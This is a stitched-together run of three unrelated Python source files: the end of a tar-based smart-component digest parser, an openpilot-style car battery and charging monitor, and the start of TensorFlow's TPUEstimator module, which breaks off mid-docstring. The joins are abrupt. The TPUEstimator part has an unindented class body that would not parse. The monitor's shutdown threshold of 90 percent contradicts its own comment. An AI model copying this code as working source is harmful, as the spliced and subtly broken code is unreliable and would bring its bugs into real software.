                    digest_name = filename
                    log.debug("Extracting %s from tar", digest_name)
                    tf.extract(digest_name, self.path)
                    tf.close()
                    os.remove(tar_file[1])
                    break
        except:
            # NOTE(review): if tarfile.open itself failed, `tf` is unbound
            # here and tf.close() raises NameError inside the handler.
            log.exception("Error getting XML file name from %s", sc_filename)
            os.remove(tar_file[1])
            tf.close()
        if not digest_name :
            log.error("Unable to find component xml file in %s", sc_filename)
        return digest_name

    # Parses the digest file and adds the required attributes to the SmartComponent object.
    def parse_digest(self, filename, component):
        log.debug("Parsing %s", filename)
        digest_dom = None
        try:
            digest_dom = parse(self.path + '\\' + filename)
        except:
            log.exception("Error parsing file %s",filename)
            return None
        # The digest's root-level <cpq_package> holds version and name.
        package_elem = digest_dom.getElementsByTagName('cpq_package')
        if not package_elem:
            log.error("No cpq_package found")
            return None
        package_elem = package_elem[0]
        version_elem = None
        name_elem = None
        for node in package_elem.childNodes:
            if node.nodeName == 'version':
                version_elem = node
            elif node.nodeName == 'name':
                name_elem = node
        # Add the version from the version element's value attribute.
        if version_elem:
            component.version = version_elem.getAttribute('value')
            log.debug("%s component version: %s", component.filename, component.version)
        else :
            log.error("Error: no component version in %s", filename)
        # The display name is the English <name_xlate> child's text.
        if name_elem:
            for node in name_elem.childNodes:
                if node.nodeName == "name_xlate" and node.getAttribute("lang") == "en":
                    for cn in node.childNodes:
                        component.name = cn.wholeText
            log.debug("%s component name: %s", component.filename, component.name)
        else :
            log.error("Error: no component name in %s", filename)

    def json(self):
        # JSON-serializable snapshot of all tracked components.
        json_list = []
        for component in self.components:
            json_list.append(component.__dict__)
        return json_list
# The main smart component manager object.
# Module-private singleton; consumers go through get_scm().
__scm = SmartComponentManager()


def get_scm():
    """Return the module-level SmartComponentManager singleton."""
    return __scm
|
power_monitoring.py | import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091  # LPF gain for 5s tau (dt/tau / (dt/tau + 1))

# A C2 uses about 1W while idling, and 30h seems like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6   # modelled car-battery energy budget, in uWh
CAR_CHARGING_RATE_W = 45          # assumed charging power while ignition is on
VBATT_PAUSE_CHARGING = 11.0       # pause device charging below this car voltage (V)
MAX_TIME_OFFROAD_S = 30*3600      # hard offroad time limit (30 h)
class PowerMonitoring:
    """Tracks device power usage and a modelled car-battery charge level to
    decide when to pause charging and when to shut down while offroad."""

    def __init__(self):
        self.params = Params()
        self.last_measurement_time = None  # Used for integration delta
        self.last_save_time = 0  # Used for saving current value in a param
        self.power_used_uWh = 0  # Integrated power usage in uWh since going into offroad
        self.next_pulsed_measurement_time = None
        self.car_voltage_mV = 12e3  # Low-passed version of health voltage
        self.integration_lock = threading.Lock()
        self.ts_last_charging_ctrl = None  # last time charging_ctrl acted

        # Restore the persisted car-battery estimate (0 if never saved).
        car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
        if car_battery_capacity_uWh is None:
            car_battery_capacity_uWh = 0

        # Reset capacity if it's low
        self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))

    # Calculation tick
    def calculate(self, health, msg):
        """Per-tick update: low-pass the car voltage, persist the battery
        estimate, and integrate either car charging (ignition on) or device
        power draw (ignition off)."""
        try:
            now = sec_since_boot()

            # If health is None, we're probably not in a car, so we don't care
            if health is None or health.health.hwType == log.HealthData.HwType.unknown:
                with self.integration_lock:
                    self.last_measurement_time = None
                    self.next_pulsed_measurement_time = None
                    self.power_used_uWh = 0
                return

            # Low-pass battery voltage
            self.car_voltage_mV = ((health.health.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))

            # Cap the car battery power and save it in a param every 10-ish seconds
            self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
            self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
            if now - self.last_save_time >= 10:
                put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
                self.last_save_time = now

            # First measurement, set integration time
            with self.integration_lock:
                if self.last_measurement_time is None:
                    self.last_measurement_time = now
                    return

            if (health.health.ignitionLine or health.health.ignitionCan):
                # If there is ignition, we integrate the charging rate of the car
                with self.integration_lock:
                    self.power_used_uWh = 0
                    integration_time_h = (now - self.last_measurement_time) / 3600
                    if integration_time_h < 0:
                        raise ValueError(f"Negative integration time: {integration_time_h}h")
                    self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
                    self.last_measurement_time = now
            else:
                # No ignition, we integrate the offroad power used by the device
                is_uno = health.health.hwType == log.HealthData.HwType.uno
                # Get current power draw somehow
                current_power = HARDWARE.get_current_power_draw()
                if current_power is not None:
                    pass  # hardware reports draw directly; use it as-is
                elif HARDWARE.get_battery_status() == 'Discharging':
                    # If the battery is discharging, we can use this measurement
                    # On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
                    current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
                elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
                    # TODO: Figure out why this is off by a factor of 3/4???
                    FUDGE_FACTOR = 1.33
                    # Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
                    def perform_pulse_measurement(now):
                        try:
                            HARDWARE.set_battery_charging(False)
                            time.sleep(5)

                            # Measure for a few sec to get a good average
                            voltages = []
                            currents = []
                            for _ in range(6):
                                voltages.append(HARDWARE.get_battery_voltage())
                                currents.append(HARDWARE.get_battery_current())
                                time.sleep(1)
                            current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))

                            self._perform_integration(now, current_power * FUDGE_FACTOR)

                            # Enable charging again
                            HARDWARE.set_battery_charging(True)
                        except Exception:
                            cloudlog.exception("Pulsed power measurement failed")

                    # Start pulsed measurement and return
                    threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
                    self.next_pulsed_measurement_time = None
                    return

                elif self.next_pulsed_measurement_time is None and not is_uno:
                    # On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
                    # Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
                    # We shouldn't do this very often, so make sure it has been some long-ish random time interval
                    self.next_pulsed_measurement_time = now + random.randint(120, 180)
                    return
                else:
                    # Do nothing
                    return

                # Do the integration
                self._perform_integration(now, current_power)
        except Exception:
            cloudlog.exception("Power monitoring calculation failed")

    def _perform_integration(self, t, current_power):
        """Accumulate `current_power` (W) over the elapsed interval into the
        device-usage and car-battery tallies; thread-safe via the lock."""
        with self.integration_lock:
            try:
                if self.last_measurement_time:
                    integration_time_h = (t - self.last_measurement_time) / 3600
                    power_used = (current_power * 1000000) * integration_time_h
                    if power_used < 0:
                        raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
                    self.power_used_uWh += power_used
                    self.car_battery_capacity_uWh -= power_used
                    self.last_measurement_time = t
            except Exception:
                cloudlog.exception("Integration failed")

    # Get the power usage
    def get_power_used(self):
        return int(self.power_used_uWh)

    def get_car_battery_capacity(self):
        return int(self.car_battery_capacity_uWh)

    # See if we need to disable charging
    def should_disable_charging(self, health, offroad_timestamp):
        """True when charging must stop: too long offroad, car voltage too
        low, or modelled car battery empty -- but never while ignition is on
        or power-down is disabled by param."""
        if health is None or offroad_timestamp is None:
            return False

        now = sec_since_boot()
        disable_charging = False
        disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
        disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3))
        disable_charging |= (self.car_battery_capacity_uWh <= 0)
        disable_charging &= (not health.health.ignitionLine and not health.health.ignitionCan)
        disable_charging &= (self.params.get("DisablePowerDown") != b"1")
        return disable_charging

    # See if we need to shutdown
    def should_shutdown(self, health, offroad_timestamp, started_seen, LEON):
        """True when the device should power off: charging is (or should be)
        disabled, or the device battery is low while discharging; only after
        a drive has been seen."""
        if health is None or offroad_timestamp is None:
            return False

        if HARDWARE.get_battery_charging():
            return False

        now = sec_since_boot()
        panda_charging = (health.health.usbPowerMode != log.HealthData.UsbPowerMode.client)
        BATT_PERC_OFF = 90  # 10 if LEON else 3

        delta_ts = now - offroad_timestamp
        should_shutdown = False
        # Wait until we have shut down charging before powering down
        should_shutdown |= (not panda_charging and self.should_disable_charging(health, offroad_timestamp))
        should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and (delta_ts > 10) )
        should_shutdown &= started_seen
        return should_shutdown

    def charging_ctrl(self, msg, ts, to_discharge, to_charge ):
        """Hysteresis control of device charging, at most once per 300s:
        stop charging above `to_discharge` percent, resume below `to_charge`.
        First call only records the timestamp."""
        if self.ts_last_charging_ctrl is None or (ts - self.ts_last_charging_ctrl) >= 300.:
            # NOTE(review): `battery_changing` presumably means "charging".
            battery_changing = HARDWARE.get_battery_charging()
            if self.ts_last_charging_ctrl:
                if msg.thermal.batteryPercent >= to_discharge and battery_changing:
                    HARDWARE.set_battery_charging(False)
                elif msg.thermal.batteryPercent <= to_charge and not battery_changing:
                    HARDWARE.set_battery_charging(True)
            self.ts_last_charging_ctrl = ts
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import signal
import threading
import time
import traceback
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.summary import summary_ops as contrib_summary
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator import util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
# Sentinel loss used before the first real loss is computed; deliberately
# large so it stands out if it ever leaks into reported values.
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
# Scope/collection name prefix for variables owned by TPUEstimator.
_TPU_ESTIMATOR = 'tpu_estimator'
# Name of the variable controlling how many steps run per Session.run loop.
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
# Key injected into `params`; reserved, users must not set it themselves.
_BATCH_SIZE_KEY = 'batch_size'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
def _create_global_step(graph):
  """Create a resource-variable global step in `graph` (default graph if None).

  Raises:
    ValueError: if a global step already exists in the graph.
  """
  target_graph = graph or ops.get_default_graph()
  if training.get_global_step(target_graph) is not None:
    raise ValueError('"global_step" already exists.')
  # Build at the graph root so the variable name is not nested in any scope.
  with target_graph.as_default() as g, g.name_scope(None):
    return variable_scope.get_variable(
        ops.GraphKeys.GLOBAL_STEP,
        shape=[],
        dtype=dtypes.int64,
        initializer=init_ops.zeros_initializer(),
        trainable=False,
        use_resource=True,
        collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
  """Return the singleton iterations-per-loop variable, creating it if absent."""
  graph = ops.get_default_graph()
  collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
  existing = graph.get_collection(collection_name)
  if len(existing) > 1:
    raise RuntimeError('Multiple iterations_per_loop_var in collection.')
  if existing:
    return existing[0]
  # Colocate with the global step so both live on the same device.
  with ops.colocate_with(training_util.get_global_step()):
    with variable_scope.variable_scope(
        _TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
      return variable_scope.get_variable(
          _ITERATIONS_PER_LOOP_VAR,
          initializer=init_ops.zeros_initializer(),
          shape=[],
          dtype=dtypes.int32,
          trainable=False,
          collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
          use_resource=True)
def _sync_variables_ops():
  """Ops that read back trainable variables, syncing TPU values to host memory."""
  sync_ops = []
  for v in variables.trainable_variables():
    checked = array_ops.check_numerics(v.read_value(),
                                       'Gradient for %s is NaN' % v.name)
    sync_ops.append(checked.op)
  return sync_ops
def _increase_eval_step_op(iterations_per_loop):
  """Returns an op to increase the eval step for TPU evaluation.

  Estimator's evaluate already increments the eval step by 1 per loop, so
  only the remaining `iterations_per_loop - 1` is added here.

  Args:
    iterations_per_loop: Tensor. The number of eval steps running in TPU
      system before returning to CPU host for each `Session.run`.

  Returns:
    An operation
  """
  eval_step = evaluation._get_or_create_eval_step()  # pylint: disable=protected-access
  delta = math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype)
  return state_ops.assign_add(eval_step, delta, use_locking=True)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(
    collections.namedtuple('TPUEstimatorSpec', [
        'mode',
        'predictions',
        'loss',
        'train_op',
        'eval_metrics',
        'export_outputs',
        'scaffold_fn',
        'host_call'
    ])):
  """Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.

  See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
  `export_outputs`.

  For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
  `metric_fn` runs on CPU to generate metrics and `tensors` represents the
  `Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
  To be precise, TPU evaluation expects a slightly different signature from the
  @{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a
  dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
  The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
  `tensors` usually specify the model logits, which are transferred back from
  TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
  size is the first dimension. Once all tensors are available at CPU host from
  all shards, they are concatenated (on CPU) and passed as positional arguments
  to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
  dict. `metric_fn` takes the `tensors` and returns a dict from metric string
  name to the result of calling a metric function, namely a `(metric_tensor,
  update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
  `eval_metrics`.

  `scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
  function should not capture any Tensors in `model_fn`.

  `host_call` is a tuple of a `function` and a list or dictionary of `tensors`
  to pass to that function and returns a list of Tensors. `host_call` currently
  works for train() and evaluate(). The Tensors returned by the function is
  executed on the CPU on every step, so there is communication overhead when
  sending tensors from TPU to CPU. To reduce the overhead, try reducing the
  size of the tensors. The `tensors` are concatenated along their major (batch)
  dimension, and so must be >= rank 1. The `host_call` is useful for writing
  summaries with @{tf.contrib.summary.create_file_writer}.
  """

  def __new__(cls,
              mode,
              predictions=None,
              loss=None,
              train_op=None,
              eval_metrics=None,
              export_outputs=None,
              scaffold_fn=None,
              host_call=None):
    """Creates a validated `TPUEstimatorSpec` instance."""
    # Validate the (fn, tensors) shape of eval_metrics/host_call up front so
    # malformed specs fail at construction time rather than at graph build.
    host_calls = {}
    if eval_metrics is not None:
      host_calls['eval_metrics'] = eval_metrics
    if host_call is not None:
      host_calls['host_call'] = host_call
    _OutfeedHostCall.validate(host_calls)
    return super(TPUEstimatorSpec, cls).__new__(
        cls,
        mode=mode,
        predictions=predictions,
        loss=loss,
        train_op=train_op,
        eval_metrics=eval_metrics,
        export_outputs=export_outputs,
        scaffold_fn=scaffold_fn,
        host_call=host_call)

  def as_estimator_spec(self):
    """Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
    # On CPU, eval_metrics/host_call can be evaluated directly: rebuild them
    # as ordinary metric ops and a host-call hook.
    host_calls = {}
    if self.eval_metrics is not None:
      host_calls['eval_metrics'] = self.eval_metrics
    if self.host_call is not None:
      host_calls['host_call'] = self.host_call
    host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
    eval_metric_ops = None
    if self.eval_metrics is not None:
      eval_metric_ops = host_call_ret['eval_metrics']
    hooks = None
    if self.host_call is not None:
      hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
    # scaffold_fn is deferred until here so it runs on the CPU path only.
    scaffold = self.scaffold_fn() if self.scaffold_fn else None
    return model_fn_lib.EstimatorSpec(
        mode=self.mode,
        predictions=self.predictions,
        loss=self.loss,
        train_op=self.train_op,
        eval_metric_ops=eval_metric_ops,
        export_outputs=self.export_outputs,
        scaffold=scaffold,
        training_hooks=hooks,
        evaluation_hooks=hooks,
        prediction_hooks=hooks)
class _OpQueueContext(object):
  """Owns the work queue and worker thread for an infeed/outfeed loop."""

  def __init__(self, name, target, args):
    self._name = name
    self._queue = Queue.Queue()
    # The context itself is prepended so the worker can read its queue.
    self._thread = threading.Thread(
        name=name, target=target, args=(self,) + args)
    self._thread.daemon = True
    self._thread.start()

  def stop(self):
    """Ask the worker's iteration generator to exit."""
    self._queue.put(_SIGNAL.STOP)

  def send_next_batch_signal(self, iterations):
    """Queue the iteration count for the next loop."""
    self._queue.put(iterations)

  def read_iteration_counts(self):
    """Yield queued iteration counts until a STOP signal arrives."""
    while True:
      item = self._queue.get(block=True)
      logging.debug('%s read iterations %s', self._name, item)
      if item == _SIGNAL.STOP:
        logging.info('%s received shutdown signal, stopping.', self._name)
        return
      yield item

  def join(self):
    """Signal shutdown and wait for the worker thread to finish."""
    logging.info('Shutting down %s thread.' % self._name)
    self.stop()
    self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
  """Work-queue context that forwards only the first batch signal.

  Subsequent calls to `send_next_batch_signal` are ignored.
  """

  def __init__(self, name, target, args):
    super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
    self._has_signaled = False

  def send_next_batch_signal(self, iterations):
    if self._has_signaled:
      return
    self._queue.put(iterations)
    self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
  """A Session hook setting up the TPU initialization, infeed, and outfeed.

  This hook does two major things:
  1. initialize and shutdown TPU system.
  2. launch and join the threads for infeed enqueue and (optional) outfeed
     dequeue.
  """

  def __init__(self,
               ctx,
               enqueue_ops,
               dequeue_ops,
               run_infeed_loop_on_coordinator=True):
    self._master_job = ctx.master_job
    self._enqueue_ops = enqueue_ops
    self._dequeue_ops = dequeue_ops
    self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
    self._initial_infeed_sleep_secs = (
        ctx.config.tpu_config.initial_infeed_sleep_secs)
    # Set when a feed error schedules the delayed session-cancellation thread.
    self._session_cancel_timer = None
    self._feed_error = None
    self._finished = False

  def begin(self):
    """Builds TPU init/shutdown ops plus summary-writer init/flush ops."""
    logging.info('TPU job name %s', self._master_job)
    self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
    self._init_ops = [tpu.initialize_system(job=self._master_job)]
    self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
    summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
    self._init_ops.extend(summary_writer_init_ops)
    # Get all the writer resources from the initializer, so we know what to
    # flush.
    for op in summary_writer_init_ops:
      self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))

  def _log_error(self, session, error):
    """Log an infeed or outfeed error.

    This logs a short error message immediately, and schedules a timer to
    emit the full stack trace and error message after a short period of time.
    If the main session has terminated by the time the timer triggers, we
    assume the real source of the error was from the main session and avoid
    emitting a stack trace for the infeed.

    Args:
      session: `tf.Session`, session to be terminated.
      error: the Exception to log.
    """
    logging.warning(
        '\n\n'
        'Error occurred during infeed/outfeed. This may be due to a compile '
        'error in the main session. Waiting for a short time for the main '
        'session to come back.\n\n%s', error)
    self._feed_error = traceback.format_exc()
    # If we've already encountered a feed error, don't schedule another
    # cancellation op.
    if self._session_cancel_timer:
      return

    def _cancel_session():
      # Close the session to avoid the main thread from hanging. If input
      # pipeline triggers any error, the infeed thread dies but the main thread
      # for TPU computation waits for the infeed enqueue forever. Close the
      # Session to cancel the main thread Session.run execution.
      #
      # We sleep for a few seconds before closing to give some time
      # for the TPU compilation error, if any, propagating, from TPU to CPU
      # host. Compilation errors should be reported by the main thread so that
      # the program can be interrupted and users can take action. Due to a race
      # condition, the infeed thread might see an error first. Closing the
      # session here immediately would result in a session cancellation
      # exception in the main thread, instead of the expected compile error.
      # User code that depends on having the proper exception type will
      # therefore be confused.
      time.sleep(5)
      # If the main session is still running, the infeed/outfeed errors are
      # legitimate, and should be logged.
      if not self._finished and self._feed_error:
        logging.error('Feed error: %s', self._feed_error)
        logging.error('Closing session. A RuntimeError should follow.')
        session.close()

    self._session_cancel_timer = threading.Thread(target=_cancel_session)
    self._session_cancel_timer.daemon = True
    self._session_cancel_timer.start()

  def _run_infeed(self, queue_ctx, session):
    """Worker loop for the infeed enqueue thread."""
    logging.info('Starting infeed thread controller.')
    if self._initial_infeed_sleep_secs:
      # BUG FIX: this previously logged `self._name`, which is never set on
      # this class (it belongs to _OpQueueContext) and raised AttributeError
      # whenever initial_infeed_sleep_secs was configured.
      logging.info('%s thread sleeping for %d seconds.', 'Infeed',
                   self._initial_infeed_sleep_secs)
      time.sleep(self._initial_infeed_sleep_secs)
      logging.info('%s thread starting after sleep', 'Infeed')
    try:
      if self._run_infeed_loop_on_coordinator:
        for count, steps in enumerate(queue_ctx.read_iteration_counts()):
          for i in xrange(steps):
            logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
            session.run(self._enqueue_ops)
      else:
        for _ in queue_ctx.read_iteration_counts():
          session.run(self._enqueue_ops)
      logging.info('Infeed thread finished, shutting down.')
    except Exception as e:  # pylint: disable=broad-except
      self._log_error(session, e)

  def _run_outfeed(self, queue_ctx, session):
    """Worker loop for the outfeed dequeue thread."""
    logging.info('Starting outfeed thread controller.')
    try:
      for count, steps in enumerate(queue_ctx.read_iteration_counts()):
        for i in xrange(steps):
          logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
          session.run(self._dequeue_ops)
      logging.info('Outfeed thread finished, shutting down.')
    except Exception as e:  # pylint: disable=broad-except
      self._log_error(session, e)

  def _create_infeed_controller(self, name, target, args):
    # Overridden by the prediction hook to use a signal-once context.
    return _OpQueueContext(name=name, target=target, args=args)

  def after_create_session(self, session, coord):
    """Initializes the TPU system and launches the feed threads."""
    logging.info('Init TPU system')
    session.run(self._init_ops,
                options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
    logging.info('Start infeed thread controller')
    self._infeed_controller = self._create_infeed_controller(
        name='InfeedController', target=self._run_infeed, args=(session,))
    logging.info('Start outfeed thread controller')
    self._outfeed_controller = _OpQueueContext(
        name='OutfeedController', target=self._run_outfeed, args=(session,))

  def before_run(self, run_context):
    """Signals both feed threads with the next loop's iteration count."""
    self._feed_error = None
    # Wait for the cancellation timer to complete before continuing.
    if self._session_cancel_timer:
      self._session_cancel_timer.join()
      self._session_cancel_timer = None
    iterations = run_context.session.run(self._iterations_per_loop_var)
    logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
    self._infeed_controller.send_next_batch_signal(iterations)
    logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
                 iterations)
    self._outfeed_controller.send_next_batch_signal(iterations)

  def end(self, session):
    """Joins the feed threads and shuts down the TPU system."""
    if self._session_cancel_timer:
      logging.warning('Feed error occurred; waiting for message.')
      self._session_cancel_timer.join()
    self._finished = True
    logging.info('Stop infeed thread controller')
    self._infeed_controller.join()
    logging.info('Stop output thread controller')
    self._outfeed_controller.join()
    logging.info('Shutdown TPU system.')
    session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
  """Infeed/outfeed session hook specialized for prediction.

  Prediction never runs the infeed loop on the coordinator, and the infeed
  controller only needs a single batch signal.
  """

  def __init__(self, ctx, enqueue_ops, dequeue_ops):
    super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
        ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=False)

  def _create_infeed_controller(self, name, target, args):
    # Signal-once queue: exactly one iteration signal is forwarded.
    return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
  """Hook that requests stop at a specified step.

  Differences from `session_run_hook._StopAfterNEvalsHook` for TPU training:
  1. It maintains the iterations_per_loop variable consumed by
     `TPUInfeedOutfeedSessionHook` (which reads it in `before_run`); since hook
     ordering is not guaranteed, the variable is written in
     `after_create_session` and `after_run`.
  2. Each `session.run` may advance the global step several times on TPU, so
     the step tensor is re-read in `after_run` to avoid a race on stale values.
  """

  def __init__(self, iterations, num_steps=None, last_step=None):
    """Initializes a `StopAtStepHook`.

    Args:
      iterations: The number of iterations to run optimizer per training loop.
      num_steps: Number of steps to execute.
      last_step: Step after which to stop.

    Raises:
      ValueError: If one of the arguments is invalid.
    """
    if num_steps is None and last_step is None:
      raise ValueError('One of num_steps or last_step must be specified.')
    if num_steps is not None and last_step is not None:
      raise ValueError('Only one of num_steps or last_step can be specified.')
    self._num_steps = num_steps
    self._last_step = last_step
    self._iterations = iterations

  def _next_iterations(self, global_step, last_step):
    """How many iterations the next loop should run, capped at the target."""
    remaining = last_step - global_step
    return min(remaining, self._iterations)

  def begin(self):
    self._global_step_tensor = training_util.get_global_step()
    if self._global_step_tensor is None:
      raise RuntimeError('Global step should be created.')
    self._iterations_per_loop_var = _create_or_get_iterations_per_loop()

  def after_create_session(self, session, coord):
    global_step = session.run(self._global_step_tensor)
    if self._last_step is None:
      self._last_step = global_step + self._num_steps
    self._iterations_per_loop_var.load(
        self._next_iterations(global_step, self._last_step), session=session)

  def after_run(self, run_context, run_values):
    # Global step cannot be retrieved via SessionRunArgs and before_run due to
    # race condition; read it fresh here.
    global_step = run_context.session.run(self._global_step_tensor)
    if global_step < self._last_step:
      self._iterations_per_loop_var.load(
          self._next_iterations(global_step, self._last_step),
          session=run_context.session)
    else:
      run_context.request_stop()
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
  """Hook that loads the eval step count into the iterations-per-loop var."""

  def __init__(self, num_steps):
    """Initializes a `_SetEvalIterationsHook`.

    Args:
      num_steps: Number of steps to execute.
    """
    self._num_steps = num_steps

  def begin(self):
    self._iterations_per_loop_var = _create_or_get_iterations_per_loop()

  def after_create_session(self, session, coord):
    # All eval steps run in a single TPU loop.
    self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
  """Hook that requests stop according to the stopping signal in prediction."""

  def __init__(self, scalar_stopping_signal):
    self._scalar_stopping_signal = scalar_stopping_signal

  def begin(self):
    self._iterations_per_loop_var = _create_or_get_iterations_per_loop()

  def after_create_session(self, session, coord):
    # This is not necessary as we do not run infeed enqueue and outfeed dequeue
    # in side threads for prediction model. But it makes the
    # TPUInfeedOutfeedSessionHook prints nice message.
    self._iterations_per_loop_var.load(1, session=session)

  def before_run(self, run_context):
    # Fetch the stopping signal alongside the user's fetches.
    return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)

  def after_run(self, run_context, run_values):
    del run_context  # unused
    if not _StopSignals.should_stop(run_values.results):
      return
    # In prediction, a stopping signal accompanies every batch, and one extra
    # batch is appended whose signal is set, telling the system to stop. That
    # final appended batch (e.g. id = 100 after user batches 0..99) must be
    # dropped before predictions are returned to the user. Raising
    # OutOfRangeError here makes MonitoredSession discard the "current"
    # (appended) batch immediately.
    raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(ctx, input_fn,
                                              inputs_structure_recorder):
  """Generates infeed enqueue ops for per-core input_fn on a single host.

  Args:
    ctx: the `_TPUContext` holding deployment information.
